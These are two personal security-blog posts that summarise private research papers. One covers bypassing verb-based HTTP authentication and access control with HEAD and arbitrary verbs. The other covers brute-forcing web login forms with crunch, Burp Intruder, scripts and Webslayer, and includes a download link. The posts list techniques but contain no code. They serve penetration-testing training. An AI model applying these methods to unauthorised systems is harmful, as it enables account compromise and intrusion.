VBAAC Bypass – Verb Based Authentication and Access Control.

This post would be dedicated to VBAAC bypass which is detailed in the ongoing research documentation I had been doing. The part of this series belongs to ‘Web Application Exploitation’ and has been pinned to this post for personal purpose of reference. Work had just exploded and for the need to trace back everything that is being done, everything about the paper goes here. The belongings of this post are entirely devoted for personal research. The blog itself is personal.

What is covered in VBAAC Bypass:

  • Concept of Server Side controls.
  • HTTP RFC’s for ‘verbs’.
  • WebDAV ‘verbs’ or ‘methods’.
  • Access control mechanisms via apache.
  • Configuring Apache to make use of access control mechanism configurations.
  • Using .htaccess file for access control mechanism.
  • Example JSP webserver based web.xml configuration.
  • Example protected resource based .htaccess configuration for apache servers.
  • Snippet application code for VBAAC bypass.
  • Authentication v/s Authorization for apache web-servers
  • Techniques to bypass ‘methods’ or ‘verbs’.
  • Bypass via HEAD
  • Bypass via arbitrary ‘verb’
  • Application server side configuration based ‘verb’ bypass.
  • Defeating Authentication and hence Authorization via verb based bypass techniques.

The entire documentation encircles creating a web application first, prior to bypassing authentication on them. Because URL based authentication are protect resources on ‘Basic’ or ‘Digest’ authentication, a very brief knowledge on HTTP standardized ‘verb’ is provided. This would be required throughout the document processing. A good amount of WebDAV verbs are also provided with attached RFC’s. Samples of the work is attached below and is for private purposes only. The document isn’t public.

 

Verb 0

 

Verb 1

 

Verb 2

 

Verb 3

 

Verb 4

 

Verb 5

 

Had a great day going ahead and improving drafting skills and had been undergoing good grip onto web application penetration testing from within the corporate companies. The point of the research is to bring back the real penetration testing scenario around the general and aware the security eroded cultural mis-aware people out there. Have a great weekend ahead!

Advertisements

Web Form Bruteforcing for Web Applications.

Hi,

This would be yet another post on how to conduct a web form bruteforce attack on a web application using GET method rather than a ‘POST’ request since the application supports ‘GET’ based requests only. This series of research papers on exploitation of targeted web application set up for vulnerability analysis is a series which is conducted for ‘testing’ purposes and for ‘training’.

What’s different with the research?

I have personally went over and deduced ‘several’ ways and just not ‘one’ way to tackle with the web application as a target. This first post and the paper itself will deliver the ‘attack’ using different methods rather than ‘stick’ to one particular method of exploitation. It’s not open to everyone and these papers are being kept private for reasons. Howsoever, this first paper will be public.

What’s not included in the paper?

I have restricted adding additional yet ‘another’ method in the paper for the public domain. This is done to keep the presentation limited to four methods. There are 5 or more possible methods of conducting the same exploitation on the target.

Sample Images of the paper?

Here are some sample images taken from the papers:

 

Sample1

 

Sample 2

 

Sample 3

 

What are some of the methods explained?

Some of the methods explained to bruteforce web form login for targeted web applications includes:

  • Exploitation via crunch password and username generated files
  • Exploitation using burp suite Intruder
  • Exploitation using python script for automation
  • Exploitation using Webslayer by feeding generated dictionaries into the tool.

I have redacted discussing more methods in the paper because the paper itself is supposed to be private for different and various specific reason. Those who are being trained under the ‘Web Application Exploitation’ course have the access to these papers and benefit it.

Where this paper could be downloaded from?

Currently this paper could be downloaded from my personal dropbox, any other changes will not be reflected here, and the original paper is updated much sooner than expected. Download link: https://www.dropbox.com/s/6uebzfzm10db14h/1.%20Web-Form%20Brute%20Force%20Methods.pdf?m=

I am considering to upload these public papers in various ways, so that if one site goes down, it could be accessible for download via another. This is a part of the series of papers to come along. Some of them would be definitely public . Others won’t be.